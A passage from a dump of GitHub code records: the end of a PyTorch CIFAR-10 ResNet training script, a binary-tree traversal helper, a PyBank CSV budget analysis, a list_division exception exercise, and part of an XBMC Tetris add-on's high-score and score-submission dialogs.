output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n metrics_dict['accuracy'].append(100. * (correct/float(\n len(test_loader.dataset))))\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\ndef main():\n device = \"cuda\"\n criterion = nn.CrossEntropyLoss()\n transform_train = transforms.Compose([\n transforms.Resize(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=128, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)\n\n # model = ResNet(BasicBlock, [2,2,2,2])\n model = models.resnet18(pretrained=True)\n model.fc = nn.Linear(in_features=512, out_features=10,bias=True)\n model = model.to(device)\n optimizer = None\n for epoch in range(30):\n tic = time.time()\n train(model, device, train_loader, optimizer, epoch, criterion)\n toc = time.time()\n print (\"Time taken for an epoch = {}\".format(toc-tic))\n metrics_dict[\"Time per epoch\"].append(toc-tic)\n test(model, device, test_loader)\n\n \n with open(\"./40pc_change_20_resnet_adam_stats.json\", 'w') as f:\n json.dump(metrics_dict, f, indent=4)\n\nif __name__ == '__main__':\n main()\n","repo_name":"dereklh4/project_744","sub_path":"crazy_resnet.py","file_name":"crazy_resnet.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33692773674","text":"from collections import deque\n\n\nclass Data:\n def __init__(self, node, rtn_func):\n self.node = node\n self.step = 0\n self.left = None\n self.right = None\n self.rtn_func = rtn_func\n\n def set_left(self, value):\n self.left = value\n\n def set_right(self, value):\n self.right = value\n\n def __repr__(self):\n return '%s' % self.node\n\n\ndef _recursion(root, rtn_func):\n stack = deque()\n stack.append(Data(root, lambda x: None))\n rtn = None\n\n while len(stack):\n current = stack.pop()\n node = current.node\n if node is None or current.step > 1:\n rtn = rtn_func(node=node, left=current.left, right=current.right)\n current.rtn_func(rtn)\n elif current.step is 0:\n stack.append(current)\n stack.append(Data(node.left, current.set_left))\n elif current.step is 1:\n stack.append(current)\n stack.append(Data(node.right, current.set_right))\n current.step += 1\n return rtn\n\n\ndef recursion(func):\n def wrapper(root):\n return _recursion(root=root, rtn_func=func)\n return wrapper\n","repo_name":"pochangl/leetcode","sub_path":"dsa/tree/binary/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12421205933","text":"import os\r\nimport csv\r\n\r\n# Path to collect data from the Resources folder\r\nbudget_csv = os.path.join ('Resources', 'budget_data.csv')\r\n\r\nmonths = []\r\nprofit = []\r\n\r\n# Read the CSV file\r\nwith open(budget_csv, 'r') as csvfile:\r\n\r\n # Split the data on commas\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n header = next(csvreader)\r\n\r\n #loop through each row of the file to get the month and the profits/loss\r\n for row in csvreader:\r\n months.append(row[0])\r\n profit.append(int(row[1])) #convert str with profit into integer so we can calculate things later\r\n\r\n # Total number of months\r\n total_months = len(months)\r\n print(f'Total months: {total_months}')\r\n \r\n # The net total amount of \"Profit/Losses\" over the entire period\r\n total_profit = sum(profit)\r\n print(f'Total profit: ${total_profit}')\r\n\r\n # The changes in \"Profit/Losses\" over the entire period, and then the average of those changes\r\n change = []\r\n month_change = []\r\n i = 1\r\n\r\n # Loop through profits and calculate changes subtracting previous months from current month\r\n for i in range(i,len(profit)):\r\n change.append(profit[i] - profit[i-1])\r\n # Store the months that changes are being computed for\r\n month_change.append(months[i])\r\n \r\n # Calculate average of changes\r\n av_change = sum(change)/len(change)\r\n print(f'Average Change: ${round(av_change,2)}')\r\n\r\n # The greatest increase in profits (date and amount) over the entire period\r\n max_value = max(change)\r\n max_month = month_change[change.index(max_value)]\r\n print(f'Greatest Increase in Profits: {max_month} (${max_value})')\r\n \r\n # The greatest decrease in profits (date and amount) over the entire period\r\n min_value = min(change)\r\n min_month = month_change[change.index(min_value)]\r\n print(f'Greatest Decrease in Profits: {min_month} (${min_value})')\r\n\r\n # Write the text file\r\n output_path = os.path.join ('analysis', 'pybank.txt')\r\n\r\n with open(output_path, 'w') as text:\r\n text.write ('Financial analysis \\n'\r\n '---------------------------------- \\n'\r\n f'Total months: {total_months} \\n'\r\n f'Total profit: ${total_profit} \\n'\r\n f'Average Change: ${round(av_change,2)} \\n'\r\n f'Greatest Increase in Profits: {max_month} (${max_value}) \\n'\r\n f'Greatest Decrease in Profits: {min_month} (${min_value})')","repo_name":"catisf/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10483090619","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n place = 0\n length = []\n while place < list_length:\n try:\n res = my_list_1[place] / my_list_2[place]\n except ZeroDivisionError:\n res = 0\n print(\"division by 0\")\n except TypeError:\n res = 0\n print(\"wrong type\")\n except IndexError:\n res = 0\n print(\"out of range\")\n finally:\n place += 1\n length.append(res)\n return length\n","repo_name":"MegaChie/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3906844838","text":"###################################################################\r\n#\r\n# Tetris v1.0\r\n#\t\tby asteron \r\n#\r\n# This module is pretty much entirely self contained, the interface to it is the showDialog on the gameDialog class\r\n# You do have to load its settings manually though.\r\n###################################################################\r\n\r\n__addonID__ = \"script.game.tetris\"\r\n\r\nimport xbmc,xbmcgui\r\nimport onlinehighscores\r\nimport os, threading, traceback\r\n\r\nSPECIAL_PROFILE_DIR = xbmc.translatePath( \"special://profile/\" )\r\nSPECIAL_SCRIPT_DATA = os.path.join( SPECIAL_PROFILE_DIR, \"addon_data\", __addonID__ )\r\nif not os.path.isdir( SPECIAL_SCRIPT_DATA ): os.makedirs( SPECIAL_SCRIPT_DATA )\r\nTETRIS_SCORES = os.path.join( SPECIAL_SCRIPT_DATA, \"%s_scores.txt\" )\r\n\r\nMAX_SCORE_LENGTH = 10\r\n\r\nACTION_PARENT_DIR\t= 9\r\nACTION_STOP\t\t= 13\r\nACTION_PREVIOUS_MENU\t= 10\r\n\r\nCOORD_720P = 1\r\nCOORD_PAL_4X3 = 6 \r\n\r\n\r\nDO_LOGGING = 0\r\ntry:\r\n\tLOG_FILE.close()\r\nexcept Exception:\r\n\tpass\r\nif DO_LOGGING:\r\n\tLOG_FILE = open(os.getcwd()[:-1]+\"\\\\scorelog.txt\",'w')\r\ndef LOG(message):\r\n\tif DO_LOGGING:\r\n\t\tLOG_FILE.write(str(message)+\"\\n\")\r\n\t\tLOG_FILE.flush()\t\r\ndef LOGCLOSE():\r\n\tif DO_LOGGING:\r\n\t\tLOG_FILE.close()\r\n\t\t\r\ndef unikeyboard(default,header=\"\"):\r\n\t\"\"\"\r\n\t\tOpens XBMC Virtual Keyboard\r\n\t\tGive it the Default value and header and it will return the value entered\r\n\t\tIf user cancelled it will return the default text.\r\n\t\"\"\"\r\n\tkb = xbmc.Keyboard(default,header)\r\n\tkb.doModal()\r\n\twhile (kb.isConfirmed()):\r\n\t\ttext = kb.getText()\r\n\t\tif len(text) > 0:\r\n\t\t\treturn text\r\n\t\tkb.doModal()\r\n\treturn default\r\n\r\n#avoid stretching on different pixel aspect ratios\r\ndef noStretch(window):\r\n\tif window.getResolution() < 2: window.setCoordinateResolution(COORD_720P)\r\n\telse: window.setCoordinateResolution(COORD_PAL_4X3)\r\n\t\r\n# I had problems with onlinehighscores giving exceptions if network unplugged... wrap it up to be safe\r\nclass SafeOnlineHighScores:\r\n\tdef __init__(self):\r\n\t\tself.ohs = onlinehighscores.highscore()\r\n\r\n\tdef get_user_id(self,u,p):\r\n\t\tLOG(\"GUI! - \" + u+'-'+p)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_user_id(u,p)\r\n\t\texcept Exception:\r\n\t\t\treturn \"0\"\r\n\tdef create_new_user(self,u,p):\r\n\t\tLOG(\"CNU! -\"+u+\"|\"+p)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.create_new_user(u,p)\r\n\t\texcept Exception:\r\n\t\t\treturn \"0\"\r\n\tdef insert_new_highscore(self,gi,ui,sc):\r\n\t\tLOG(\"INH!\")\r\n\t\ttry:\r\n\t\t\treturn self.ohs.insert_new_highscore(gi,ui,sc)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\tdef get_highscore(self,i):\r\n\t\tLOG(\"GHS - \" + str(i))\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_highscore(i)\r\n\t\texcept Exception:\r\n\t\t\tLOG(\"GHS error\")\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"\"\r\n\tdef get_game_id(self,g):\r\n\t\tLOG(\"GGID - \" + g)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.get_game_id(g)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\tdef create_new_game(self,g):\r\n\t\tLOG(\"CNG! - \" +g)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.create_new_game(g)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\r\nONLINEHIGHSCORE=SafeOnlineHighScores()\r\n\r\nclass SubmitDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self,parent=None):\r\n\t\tnoStretch(self)\r\n\t\tself.parent = parent\r\n\t\tx = self.parent.posX + 50\r\n\t\ty = self.parent.posY + 130\r\n\t\timagedir = self.parent.imagedir\r\n\t\tself.addControl(xbmcgui.ControlImage(x,y,243,113, imagedir+'submit.png'))\r\n\t\tself.btnUsername = xbmcgui.ControlButton(x + 20, y+10, 100, 25, 'Username:', textOffsetY=3,focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\tself.btnPassword = xbmcgui.ControlButton(x + 20, y+40, 100, 25, 'Password:', textOffsetY=3,focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\tself.lblUsername = xbmcgui.ControlLabel(x+135, y+10+3, 100, 25, '')\r\n\t\tself.lblPassword = xbmcgui.ControlLabel(x+135, y+40+3, 100, 25, '')\r\n\t\tself.btnSubmit = xbmcgui.ControlButton(x+20, y+75, 100, 25, 'Submit',focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\t\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tfor control in (self.btnUsername, self.btnPassword, self.btnSubmit, self.lblUsername, self.lblPassword):\r\n\t\t\tself.addControl(control)\r\n\t\t\r\n\t\tself.btnUsername.controlUp(self.btnSubmit)\r\n\t\tself.btnPassword.controlUp(self.btnUsername)\r\n\t\tself.btnSubmit.controlUp(self.btnPassword)\r\n\t\tself.btnUsername.controlDown(self.btnPassword)\r\n\t\tself.btnPassword.controlDown(self.btnSubmit)\r\n\t\tself.btnSubmit.controlDown(self.btnUsername)\r\n\t\tself.setFocus(self.btnSubmit)\r\n\t\t\r\n\t\tself.username = ''\r\n\t\tself.password = ''\r\n\t\tself.userID = \"0\"\r\n\t\r\n\tdef setUsername(self,username):\r\n\t\tself.username = username\r\n\t\tself.lblUsername.setLabel(username)\r\n\t\tself.userID = \"0\"\r\n\t\t\r\n\tdef setPassword(self,password):\r\n\t\tself.password = password\r\n\t\tself.lblPassword.setLabel('*'*len(password))\r\n\t\tself.userID = \"0\"\r\n\t\r\n\tdef promptUsername(self):\r\n\t\tself.setUsername(unikeyboard(self.username, 'Enter Username'))\r\n\t\r\n\tdef promptPassword(self):\r\n\t\tif self.username == '':\r\n\t\t\tself.setPassword(unikeyboard(self.password, 'Enter Password'))\r\n\t\telse:\r\n\t\t\tself.setPassword(unikeyboard(self.password, 'Enter Password for ' + self.username))\r\n\t\t\r\n\tdef getUserID(self,refresh=True):\r\n\t\tif not self.userID == \"0\" and not refresh:\r\n\t\t\treturn self.userID\r\n\t\tif self.username == \"\":\tself.promptUsername()\r\n\t\tif self.username == \"\": return \"0\"\r\n\t\tif self.password == \"\":\tself.promptPassword()\t\t\t\r\n\t\tif self.password == \"\":\treturn \"0\"\t\t\t\r\n\t\t\t\r\n\t\tuserID = ONLINEHIGHSCORE.get_user_id(self.username,self.password)\r\n\t\tLOG(\"GUID ID=\"+userID)\r\n\t\tif userID == \"0\":\r\n\t\t\tif xbmcgui.Dialog().yesno(self.parent.gamename, 'Account for username '+self.username+' not found', 'Create new account?'):\r\n\t\t\t\tuserID = ONLINEHIGHSCORE.create_new_user(self.username, self.password)\r\n\t\treturn userID\r\n\t\r\n\tdef\tsubmitScore(self,score):\r\n\t\tLOG(\"SS \" + str(score) + '-'+str(self.userID))\r\n\t\tif self.userID == \"0\":\r\n\t\t\tself.userID = self.getUserID()\r\n\t\tLOG(\"SS2 \" + self.userID)\r\n\t\tif self.userID == \"0\":\r\n\t\t\tLOG(\"SS2.1\")\r\n\t\t\treturn False\r\n\t\tretVal = ONLINEHIGHSCORE.insert_new_highscore(self.parent.gameID, self.userID, str(score))\r\n\t\tLOG(\"SS4 \" + str(retVal))\t\r\n\t\treturn retVal\r\n\t\t\r\n\tdef onControl(self, control):\r\n\t\tLOG('SD - OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnUsername:\r\n\t\t\tself.promptUsername()\r\n\t\telif control == self.btnPassword:\r\n\t\t\tself.promptPassword()\r\n\t\telif control == self.btnSubmit:\r\n\t\t\tif not self.submitScore(self.parent.score) == \"0\":\r\n\t\t\t\txbmcgui.Dialog().ok(self.parent.gamename, 'Submission Successful!')\r\n\t\t\t\tself.close()\r\n\t\t\telse:\r\n\t\t\t\txbmcgui.Dialog().ok(self.parent.gamename, 'Submission Failure')\r\n\t\t\t\r\n\r\n\tdef onAction(self, action):\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.close()\t\t\t\r\n\t\t\r\n\t\r\nclass HighScoreDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self,parent=None):\r\n\t\tnoStretch(self)\r\n\t\tself.parent = parent\r\n\t\tself.posX = parent.posX -55\r\n\t\tself.posY = parent.posY + 30\r\n\t\t\r\n\t\tself.hsFileName = TETRIS_SCORES % self.parent.gamename\r\n\t\tself.localHighScores = self.loadLocalHighScores()\r\n\t\tself.onlineHighScores = []\r\n\t\t\r\n\t\tself.buildGui()\r\n\t\tself.currentTab = 0 #local\r\n\t\tself.populateList(self.localHighScores)\r\n\t\t\r\n\t\t\r\n\t\t\r\n\tdef buildGui(self):\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX,self.posY,270,355, self.parent.imagedir+'highscore.png'))\r\n\t\tself.imgtabLocal = [\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-focus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-focus.png')]\r\n\t\tself.imgtabOnline = [\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-focus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-focus.png')]\r\n\t\t# This adds the textures so that the select textures are in front of the unselected textures... this way tabs can have a little overlap and it looks nicer\r\n\t\tfor i in range(0,4): \r\n\t\t\tself.addControl(self.imgtabLocal[i])\r\n\t\t\tself.imgtabLocal[i].setVisible(False)\r\n\t\t\tself.addControl(self.imgtabOnline[i])\r\n\t\t\tself.imgtabOnline[i].setVisible(False)\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX+5,self.posY+38,263,4, self.parent.imagedir+'seperator.png'))\r\n\t\tself.btnLocal = xbmcgui.ControlButton(self.posX + 20, self.posY+12, 70, 25, 'Local',focusTexture='',noFocusTexture='')\r\n\t\tself.btnOnline = xbmcgui.ControlButton(self.posX + 80, self.posY+12, 70, 25, 'Online',focusTexture='',noFocusTexture='')\r\n\t\tself.btnRefresh = xbmcgui.ControlButton(self.posX + 180, self.posY+10, 70, 25, 'Refresh',focusTexture=self.parent.imagedir+\"button-focus.png\",noFocusTexture=self.parent.imagedir+\"button-nofocus.png\")\r\n\t\tself.lstHighScores = xbmcgui.ControlList(self.posX +20, self.posY + 50, 230, 320)\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(self.btnLocal)\r\n\t\tself.addControl(self.btnOnline)\r\n\t\tself.addControl(self.lstHighScores)\r\n\t\tself.addControl(self.btnRefresh)\r\n\t\t\r\n\t\tself.btnLocal.controlLeft(self.btnRefresh)\r\n\t\tself.btnRefresh.controlLeft(self.btnOnline)\r\n\t\tself.btnOnline.controlLeft(self.btnLocal)\r\n\t\tself.btnLocal.controlRight(self.btnOnline)\r\n\t\tself.btnRefresh.controlRight(self.btnLocal)\r\n\t\tself.btnOnline.controlRight(self.btnRefresh)\r\n\t\t#self.btnRefresh.setVisible(False)\r\n\t\tself.lstHighScores.setEnabled(False)\r\n\t\tself.btnRefresh.setEnabled(False)\r\n\t\tself.setFocus(self.btnLocal)\r\n\t\tself.imgtabLocal[3].setVisible(True)\r\n\t\tself.imgtabOnline[0].setVisible(True)\r\n\t\t\r\n\tdef isHighScore(self,score):\r\n\t\tscores = [s[1] for s in self.localHighScore]\r\n\t\tscores.append(score)\r\n\t\tscores.sort()\r\n\t\tif scores.index(score) < self.maxScoreLength:\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\tdef parseScores(self, data):\r\n\t\tLOG('Parsing data ')\r\n\t\tscores = []\r\n\t\tfor line in data.split(\"\\n\"):\r\n\t\t\tnameScore = line.split(\"|\")\r\n\t\t\tif len(nameScore) == 2:\r\n\t\t\t\tscores.append((nameScore[0],nameScore[1]))\r\n\t\tLOG(\"scores\")\r\n\t\tLOG(scores)\r\n\t\treturn scores\r\n\t\r\n\tdef populateList(self,scores):\r\n\t\tLOG(\"PL setting to \"+str(scores))\r\n\t\txbmcgui.lock()\r\n\t\tself.updateTabImages()\r\n\t\tself.lstHighScores.reset()\r\n\t\tfor name,score in scores:\r\n\t\t\tself.lstHighScores.addItem(xbmcgui.ListItem(name,str(score)))\r\n\t\txbmcgui.unlock()\r\n\t\r\n\tdef loadLocalHighScores(self):\r\n\t\tdata = ''\r\n\t\tif os.path.exists(self.hsFileName):\r\n\t\t\tinput = open(self.hsFileName,'r')\r\n\t\t\tdata = input.read()\r\n\t\t\tinput.close()\t\t\r\n\t\treturn self.parseScores(data)\r\n\t\t\r\n\tdef loadOnlineHighScores(self):\r\n\t\tLOG(\"LOH\")\r\n\t\tscores = self.parseScores(ONLINEHIGHSCORE.get_highscore(self.parent.gameID))\r\n\t\tLOG(\"LOH score: \" + str(scores))\r\n\t\treturn scores\r\n\t\r\n\tdef replaceName(self, oldName, newName, score):\r\n\t\ttry: idx = self.localHighScores.index((oldName,score))\r\n\t\texcept: return False\r\n\t\tself.localHighScores[idx] = (newName,score)\r\n\t\tself.currentTab = 0\r\n\t\tself.populateList(self.localHighScores)\r\n\t\treturn True\r\n\t\r\n\tdef addScore(self,name,score):\r\n\t\r\n\t\tLOG('AS1 - ' + str(name) + '|'+str(score))\r\n\t\tself.localHighScores.append((name,score)) #add\r\n\t\tself.localHighScores.sort(key=lambda x: int(x[1]),reverse=True) #sort\r\n\t\tself.localHighScores = self.localHighScores[0:min(len(self.localHighScores),self.parent.maxScoreLength)] #truncate\r\n\t\tself.populateList(self.localHighScores)\r\n\t\tLOG('AS5')\r\n\t\ttry:\r\n\t\t\treturn self.localHighScores.index((name,score)) #return index or -1\r\n\t\texcept Exception:\r\n\t\t\treturn -1\r\n\t\r\n\tdef getHighestScore(self):\r\n\t\tif len(self.localHighScores) > 0:\r\n\t\t\treturn self.localHighScores[0]\r\n\t\telse:\r\n\t\t\treturn ('-------','0')\r\n\t\r\n\tdef saveHighScores(self):\r\n\t\toutput = open(self.hsFileName,'w')\r\n\t\tLOG(\"Scores:\" + str(self.localHighScores))\r\n\t\tscoreStrings = [str(x[0]) +\"|\"+str(x[1]) for x in self.localHighScores]\r\n\t\toutput.write(\"\\n\".join(scoreStrings))\r\n\t\toutput.close()\r\n\t\r\n\tdef updateTabImages(self):\r\n\t\tLOG(\"UTI1\")\r\n\t\tfocusControl = self.getFocus()\r\n\t\timgidx = [0,0]\r\n\t\tif focusControl == self.btnLocal:\r\n\t\t\tif self.currentTab == 0: imgidx = [3,0]\r\n\t\t\telse: imgidx = [1,2]\r\n\t\telif focusControl == self.btnOnline:\r\n\t\t\tif self.currentTab == 1: imgidx = [0,3]\r\n\t\t\telse: imgidx = [2,1]\t\t\r\n\t\telse:\r\n\t\t\tif self.currentTab == 0: imgidx = [2,0]\r\n\t\t\telse: imgidx = [0,2]\r\n\t\tLOG(\"UTI2 \" + str(imgidx))\r\n\t\tfor i in range(4):\r\n\t\t\tself.imgtabLocal[i].setVisible(i==imgidx[0])\r\n\t\t\tself.imgtabOnline[i].setVisible(i==imgidx[1])\r\n\t\t\r\n\tdef onControl(self, control):\r\n\t\tLOG('HS - OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnLocal:\r\n\t\t\tself.currentTab = 0\r\n\t\t\tself.populateList(self.localHighScores)\r\n\t\t\t#self.btnRefresh.setVisible(False)\r\n\t\t\tself.btnRefresh.setEnabled(False)\r\n\t\tLOG('HS - OC2')\r\n\t\tif control == self.btnOnline:\r\n\t\t\tif len(self.onlineHighScores) == 0:\r\n\t\t\t\tLOG('HS - OC2.1')\r\n\t\t\t\tself.onlineHighScores = self.loadOnlineHighScores()\r\n\t\t\tLOG('HS - OC2.2')\r\n\t\t\tself.currentTab = 1\r\n\t\t\tself.populateList(self.onlineHighScores)\r\n\t\t\t#self.btnRefresh.setVisible(True)\r\n\t\t\tself.btnRefresh.setEnabled(True)\r\n\t\tLOG('HS - OC3')\r\n\t\tif control == self.btnRefresh:\r\n\t\t\tself.currentTab = 1\r\n\t\t\tself.onlineHighScores = self.loadOnlineHighScores()\r\n\t\t\tself.populateList(self.onlineHighScores)\r\n\t\tLOG('HS - OC4')\r\n\t\r\n\tdef onAction(self, action):\r\n\t\tself.updateTabImages()\r\n\t\tLOG('HS - OA1')\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.close()\r\n\t\r\nWINDOW_NONE = 0\r\nWINDOW_GAME = 3\r\nWINDOW_HIGHSCORE = 1\r\nWINDOW_SUBMIT = 2\r\nclass GameDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self, gamename='',x=100,y=100, imagedir='', maxScoreLength=10):\r\n\t\tnoStretch(self)\r\n\t\tself.posX = x\r\n\t\tself.posY = y\r\n\t\t# I had a problem with different window dialogs having duplicate ControlIDs\r\n\t\t# This generated two differen onControl events, use self.focusWindow as a lock\r\n\t\tself.focusWindow = WINDOW_GAME \r\n\t\tself.imagedir = imagedir\r\n\t\tself.score = \"0\"\r\n\t\tself.buildGui()\r\n\t\tself.gamename = gamename\r\n\t\tself.gameID = ''\r\n\t\tLOG(\"init gameID is \" + str(self.gameID))\r\n\t\tself.maxScoreLength = maxScoreLength\r\n\t\tself.retVal = True\r\n\t\t\r\n\t\tself.username = ''\r\n\t\tself.dlgSubmit = SubmitDialog(parent=self)\r\n\t\tself.dlgHighScores = HighScoreDialog(parent=self)\r\n\t\t\r\n\tdef buildGui(self):\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX,self.posY,270,150, self.imagedir+'panel.png'))\r\n\t\tself.btnUsername = xbmcgui.ControlButton(self.posX + 20, self.posY+10, 100, 25, 'Name:', textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.lblUsername = xbmcgui.ControlLabel(self.posX+140, self.posY+13, 100, 25, '')\r\n\t\tself.lblScore\t= xbmcgui.ControlLabel(self.posX+140, self.posY+40, 100, 25, '0')\r\n\t\tself.addControl(xbmcgui.ControlLabel(self.posX+30, self.posY+40, 100, 25, 'Score:'))\r\n\t\tself.btnNewGame = xbmcgui.ControlButton(self.posX + 20, self.posY+75, 100, 25, 'Play Again',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnHighScores = xbmcgui.ControlButton(self.posX + 130, self.posY+75, 120, 25, 'High Scores',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnSubmit = xbmcgui.ControlButton(self.posX + 130, self.posY+105, 120, 25, 'Submit Online',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnQuit = xbmcgui.ControlButton(self.posX + 20, self.posY+105, 100, 25, 'Quit',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tfor control in (self.btnNewGame, self.btnHighScores, self.btnQuit, self.btnSubmit, self.btnUsername, self.lblUsername, self.lblScore):\r\n\t\t\tself.addControl(control)\r\n\t\tself.btnNewGame.setNavigation(self.btnUsername, self.btnQuit, self.btnHighScores, self.btnHighScores)\r\n\t\tself.btnHighScores.setNavigation(self.btnUsername, self.btnSubmit, self.btnNewGame, self.btnNewGame)\r\n\t\tself.btnQuit.setNavigation(self.btnNewGame, self.btnUsername, self.btnSubmit, self.btnSubmit)\r\n\t\tself.btnSubmit.setNavigation(self.btnHighScores, self.btnUsername, self.btnQuit, self.btnQuit)\r\n\t\tself.btnUsername.controlDown(self.btnNewGame)\r\n\t\tself.setFocus(self.btnNewGame)\r\n\t\t\r\n\tdef showDialog(self,score):\r\n\t\tLOG(\"Show Dialog\")\r\n\t\tself.score = str(score)\r\n\t\tself.lblScore.setLabel(str(score))\r\n\t\twhile self.username == '':\r\n\t\t\tself.setUsername(unikeyboard(self.username, \"Enter New Player Name\"))\r\n\t\t\tif self.dlgSubmit.username == '':\r\n\t\t\t\tself.dlgSubmit.setUsername(self.username)\r\n\t\tself.dlgHighScores.addScore(self.username,str(score))\r\n\t\tself.gameID = self.getGameID(self.gamename)\r\n\t\t#xbmc.enableNavSounds(True)\r\n\t\tself.focusWindow = WINDOW_GAME\r\n\t\tself.doModal() #leaves xbmcgui locked\r\n\t\t#xbmc.enableNavSounds(False)\r\n\t\tLOG(\"SD7\")\r\n\t\tself.dlgHighScores.saveHighScores()\r\n\t\txbmcgui.unlock()\r\n\t\tLOG(\"SD8\")\r\n\t\treturn self.retVal\r\n\t\t\r\n\t\t\r\n\t\t\r\n\tdef getGameID(self,gamename):\r\n\t\tLOG('gGID ' +self.gameID)\r\n\t\tif self.gameID == '':\r\n\t\t\tself.gameID = ONLINEHIGHSCORE.get_game_id(gamename)\t\t\r\n\t\tif self.gameID == \"0\":\r\n\t\t\tLOG(\"game not found\");\r\n\t\t\tself.gameID = ONLINEHIGHSCORE.create_new_game(gamename)\r\n\t\treturn self.gameID\r\n\r\n\t\t\r\n\tdef setUsername(self,username):\r\n\t\tself.username = username\r\n\t\tself.lblUsername.setLabel(username)\r\n\t\r\n\tdef onControl(self, control):\r\n\t\tif not self.focusWindow == WINDOW_GAME:\r\n\t\t\treturn\r\n\t\tLOG('OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnUsername:\r\n\t\t\toldname = self.username\r\n\t\t\tself.setUsername(unikeyboard(self.username, \"Enter New 